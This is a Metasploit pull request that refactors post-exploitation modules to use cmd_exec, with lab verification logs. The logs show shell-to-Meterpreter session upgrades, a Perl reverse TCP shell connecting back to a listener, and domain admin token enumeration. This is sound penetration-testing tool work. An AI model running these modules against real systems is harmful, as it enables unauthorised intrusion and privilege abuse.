### PR TITLE
Fix #3951: Use cmd_exec on "Windows::Registry"

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -122,7 +122,11 @@ module Msf::Post::Common
 
       process.close
     when /shell/
-      o = session.shell_command_token("#{cmd} #{args}", time_out)
+      if args.nil? || args.empty?
+        o = session.shell_command_token("#{cmd}", time_out)
+      else
+        o = session.shell_command_token("#{cmd} #{args}", time_out)
+      end
       o.chomp! if o
     end
     return "" if o.nil?

--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -170,7 +170,7 @@ protected
     elsif view == REGISTRY_VIEW_64_BIT
       cmd += " /reg:64"
     end
-    session.shell_command_token_win32("#{cmd} #{suffix}")
+    cmd_exec("#{cmd} #{suffix}")
   end
 
   def shell_registry_cmd_result(suffix, view = REGISTRY_VIEW_NATIVE)

--- a/modules/post/multi/gather/multi_command.rb
+++ b/modules/post/multi/gather/multi_command.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
         'License'       => MSF_LICENSE,
         'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform'      => %w{ bsd linux osx unix win },
-        'SessionTypes'  => [ 'meterpreter','shell' ]
+        'SessionTypes'  => ['meterpreter']
       ))
     register_options(
       [
@@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post
 
   # Run Method for when run command is issued
   def run
-    session_type = session.type
     print_status("Running module against #{sysinfo['Computer']}")
     if not ::File.exists?(datastore['RESOURCE'])
       raise "Resource File does not exists!"
@@ -41,11 +40,7 @@ class Metasploit3 < Msf::Post
           tmpout << "      Output of #{cmd}\n"
           tmpout << "*****************************************\n"
           print_status "Running command #{cmd.chomp}"
-          if session_type =~ /meterpreter/
-            tmpout << cmd_exec(cmd.chomp)
-          elsif session_type =~ /shell/
-            tmpout << session.shell_command_token(cmd.chomp).chomp
-          end
+          tmpout << cmd_exec(cmd.chomp)
           vprint_status tmpout
           command_log = store_loot("host.command", "text/plain", session,tmpout ,
             "#{cmd.gsub(/\.|\/|\s/,"_")}.txt", "Command Output \'#{cmd.chomp}\'")

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -196,12 +196,12 @@ class Metasploit3 < Msf::Post
       sent = 0
       aborted = false
       cmds.each { |cmd|
-        ret = session.shell_command_token(cmd)
+        ret = cmd_exec(cmd)
         if !ret
           aborted = true
         else
           ret.strip!
-          aborted = true if !ret.empty?
+          aborted = true if !ret.empty? && ret !~ /The process tried to write to a nonexistent pipe./
         end
         if aborted
           print_error('Error: Unable to execute the following command: ' + cmd.inspect)

--- a/modules/post/multi/manage/system_session.rb
+++ b/modules/post/multi/manage/system_session.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Post
 
     if not cmd.empty?
       print_status("Executing reverse tcp shel to #{lhost} on port #{lport}")
-      session.shell_command_token("(#{cmd} &)")
+      cmd_exec("(#{cmd} &)")
     end
   end
 

--- a/modules/post/windows/gather/enum_computers.rb
+++ b/modules/post/windows/gather/enum_computers.rb
@@ -29,7 +29,6 @@ class Metasploit3 < Msf::Post
   def run
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
     domain = get_domain()
-
     if not domain.empty?
       hostname_list = get_domain_computers()
       list_computers(domain, hostname_list)
@@ -49,7 +48,7 @@ class Metasploit3 < Msf::Post
   def get_domain_computers()
     computer_list = []
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net view").split(devisor)[1]
+    raw_list = cmd_exec('net view').split(devisor)[1]
     if raw_list =~ /The command completed successfully/
       raw_list.sub!(/The command completed successfully\./,'')
       raw_list.gsub!(/\\\\/,'')

--- a/modules/post/windows/gather/enum_domain_tokens.rb
+++ b/modules/post/windows/gather/enum_domain_tokens.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Post
   # List local group members
   def list_group_mem(group)
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net localgroup #{group}").split(devisor)[1]
+    raw_list = cmd_exec("net localgroup #{group}").split(devisor)[1]
     account_list = raw_list.split("\r\n")
     account_list.delete("The command completed successfully.")
     return account_list
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
   def list_domain_group_mem(group)
     account_list = []
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net groups \"#{group}\" /domain").split(devisor)[1]
+    raw_list = cmd_exec("net groups \"#{group}\" /domain").split(devisor)[1]
     raw_list.split(" ").each do |m|
       account_list << m
     end


### PR DESCRIPTION
This pull request is the last one related to https://github.com/rapid7/metasploit-framework/issues/3951 and should fix and close the issue.

Here is the list of changes:
- Modifies the `cmd_exec` method in the `Post::Common` mixin. When using shell sessions, it used to send args to `session.shell_command_token`, even when there weren't args. It was fine on unix environments, but used to cause problems on windows shell sessions. Since meterpreter is the usual way of getting windows sessions I guess it wasn't a problem a lot of time. Basically this pull request doesn't send the appending `" #{args}"`  if there aren't arguments
- Modifies the `Windows::Registry` mixin to use `cmd_exec`
- Modifies a bunch of remaining modules to use `cmd_exec` too.
- Deletes the `shell` type of session for the `multi_command` module. It wasn't working anyway because it uses meterpreter session features. So I guess anyone tried to use this module with a shell session before.

I'm providing verification steps, anyway I tried to verify everything by myself to make things easier, feel free to repeat any testing. By the way, the purpose of this PR is **fixing #3951** it means favoring cmd_exec. Since it updates a bunch of modules of course, things can be done in some old modules, but it's not the purpose of this PR fix every error on every module touch on this PR. :) 
## Verification
- [x] Windows::Registry: Use the post/test/registry to verify which all the tests passes with a meterpreter session. (not all the test passes with a shell session but it was true also before this change).

```
msf exploit(handler) > loadpath test/modules
Loaded 34 modules:
    13 auxiliarys
    13 exploits
    8 posts
msf exploit(handler) > use post/test/registry
msf post(registry) > set session 1
session => 1
msf post(registry) > run

[*] Running against session 1
[*] Session type is meterpreter and platform is x86/win32
[*] PENDING: should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should return normalized values
[+] should enumerate keys and values
[+] should create keys
[+] should write REG_SZ values
[+] should write REG_DWORD values
[+] should delete keys
[*] Passed: 7; Failed: 0
[*] Post module execution completed
```
- [x] Use shell_to_meterpreter on a shell linux session. Verify which you get a meterpreter session

```
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 172.16.158.1:4433
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 172.16.158.136
[*] Command stager progress: 100.00% (670/670 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > [*] Meterpreter session 2 opened (172.16.158.1:4433 -> 172.16.158.136:41098) at 2015-06-29 10:46:37 -0500
```
- [x] Use shell_to_meterpreter on a shell windows session. Verify which you get a meterpreter session

```
msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 172.16.158.1:4433
[*] Starting the payload handler...
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
[*] Command stager progress: 6.66% (6796/102108 bytes)
[*] Command stager progress: 8.32% (8495/102108 bytes)
[*] Command stager progress: 9.98% (10194/102108 bytes)
[*] Command stager progress: 11.65% (11893/102108 bytes)
[*] Command stager progress: 13.31% (13592/102108 bytes)
[*] Command stager progress: 14.98% (15291/102108 bytes)
[*] Command stager progress: 16.64% (16990/102108 bytes)
[*] Command stager progress: 18.30% (18689/102108 bytes)
[*] Command stager progress: 19.97% (20388/102108 bytes)
[*] Command stager progress: 21.63% (22087/102108 bytes)
[*] Command stager progress: 23.29% (23786/102108 bytes)
[*] Command stager progress: 24.96% (25485/102108 bytes)
[*] Command stager progress: 26.62% (27184/102108 bytes)
[*] Command stager progress: 28.29% (28883/102108 bytes)
[*] Command stager progress: 29.95% (30582/102108 bytes)
[*] Command stager progress: 31.61% (32281/102108 bytes)
[*] Command stager progress: 33.28% (33980/102108 bytes)
[*] Command stager progress: 34.94% (35679/102108 bytes)
[*] Command stager progress: 36.61% (37378/102108 bytes)
[*] Command stager progress: 38.27% (39077/102108 bytes)
[*] Command stager progress: 39.93% (40776/102108 bytes)
[*] Command stager progress: 41.60% (42475/102108 bytes)
[*] Command stager progress: 43.26% (44174/102108 bytes)
[*] Command stager progress: 44.93% (45873/102108 bytes)
[*] Command stager progress: 46.59% (47572/102108 bytes)
[*] Command stager progress: 48.25% (49271/102108 bytes)
[*] Command stager progress: 49.92% (50970/102108 bytes)
[*] Command stager progress: 51.58% (52669/102108 bytes)
[*] Command stager progress: 53.25% (54368/102108 bytes)
[*] Command stager progress: 54.91% (56067/102108 bytes)
[*] Command stager progress: 56.57% (57766/102108 bytes)
[*] Command stager progress: 58.24% (59465/102108 bytes)
[*] Command stager progress: 59.90% (61164/102108 bytes)
[*] Command stager progress: 61.57% (62863/102108 bytes)
[*] Command stager progress: 63.23% (64562/102108 bytes)
[*] Command stager progress: 64.89% (66261/102108 bytes)
[*] Command stager progress: 66.56% (67960/102108 bytes)
[*] Command stager progress: 68.22% (69659/102108 bytes)
[*] Command stager progress: 69.88% (71358/102108 bytes)
[*] Command stager progress: 71.55% (73057/102108 bytes)
[*] Command stager progress: 73.21% (74756/102108 bytes)
[*] Command stager progress: 74.88% (76455/102108 bytes)
[*] Command stager progress: 76.54% (78154/102108 bytes)
[*] Command stager progress: 78.20% (79853/102108 bytes)
[*] Command stager progress: 79.87% (81552/102108 bytes)
[*] Command stager progress: 81.53% (83251/102108 bytes)
[*] Command stager progress: 83.20% (84950/102108 bytes)
[*] Command stager progress: 84.86% (86649/102108 bytes)
[*] Command stager progress: 86.52% (88348/102108 bytes)
[*] Command stager progress: 88.19% (90047/102108 bytes)
[*] Command stager progress: 89.85% (91746/102108 bytes)
[*] Command stager progress: 91.52% (93445/102108 bytes)
[*] Command stager progress: 93.18% (95144/102108 bytes)
[*] Command stager progress: 94.84% (96843/102108 bytes)
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Command stager progress: 100.00% (102108/102108 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > [*] Meterpreter session 3 opened (172.16.158.1:4433 -> 172.16.158.131:1056) at 2015-06-29 11:27:42 -0500

msf post(shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : JUAN-D29DA074A1
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 3 closed.  Reason: User exit
```
- [x] Verify which the `post/multi/manage/system_session` works on a shell linux session

```
msf post(system_session) > show options

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an exploit/multi/handler to receive the connection
   LHOST    172.16.158.1     yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION  1                yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (Accepted: auto, ruby, python, perl, bash)

msf post(system_session) > set handler true
handler => true
msf post(system_session) > run

[*] Starting exploit/multi/handler
[*] Started reverse handler on 172.16.158.1:4433
[*] Starting the payload handler...
[*] Perl was found on target
[*] Perl reverse shell selected
[*] Executing reverse tcp shel to 172.16.158.1 on port 4433
[*] Post module execution completed
msf post(system_session) > [*] Command shell session 2 opened (172.16.158.1:4433 -> 172.16.158.136:41104) at 2015-06-29 11:35:40 -0500

msf post(system_session) > sessions -i 2
[*] Starting interaction with 2...

id
uid=1000(juan) gid=1000(juan) groups=1000(juan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
^C
Abort session 2? [y/N]  y

[*] 172.16.158.136 - Command shell session 2 closed.  Reason: User exit
```
- [x] Verify which the `enum_domain_tokens` module works on a windows meterpreter session. I ran it on a windows 2008  domain controller

```
msf post(enum_domain_tokens) > run

[*] Running module against WIN-F46QAN3U3UH
[+] Current session is running under a Domain Admin Account
[+]     This host is a Domain Controller!
[*] Checking for Domain group and user tokens

Impersonation Tokens with Domain Context
========================================

 Token Type     Account Type  Name                                         Domain Admin
 ----------     ------------  ----                                         ------------
 Delegation     User          DEMO\Administrator                           true
 Delegation     Group         DEMO\Denied RODC Password Replication Group  false
 Delegation     Group         DEMO\Domain Admins                           false
 Delegation     Group         DEMO\Domain Users                            false
 Delegation     Group         DEMO\Schema Admins                           false
 Delegation     Group         DEMO\Group Policy Creator Owners             false
 Delegation     Group         DEMO\Enterprise Admins                       false
 Impersonation  Group         DEMO\Domain Controllers                      false
 Impersonation  Group         DEMO\WIN-F46QAN3U3UH$                        false


[*] Checking for processes running under domain user

Processes under Domain Context
==============================

 Name               PID   Arch  User                Domain Admin
 ----               ---   ----  ----                ------------
 TPAutoConnect.exe  2828  x86   DEMO\Administrator  true
 cmd.exe            1872  x86   DEMO\Administrator  true
 cmd.exe            2516  x86   DEMO\Administrator  true
 cmd.exe            2100  x86   DEMO\Administrator  true
 cmd.exe            3940  x86   DEMO\Administrator  true
 dwm.exe            3416  x86   DEMO\Administrator  true
 explorer.exe       3464  x86   DEMO\Administrator  true
 mmc.exe            2764  x86   DEMO\Administrator  true
 msf.exe            2548  x86   DEMO\Administrator  true
 taskeng.exe        2956  x86   DEMO\Administrator  true
 vmtoolsd.exe       3560  x86   DEMO\Administrator  true


[*] Post module execution completed
```
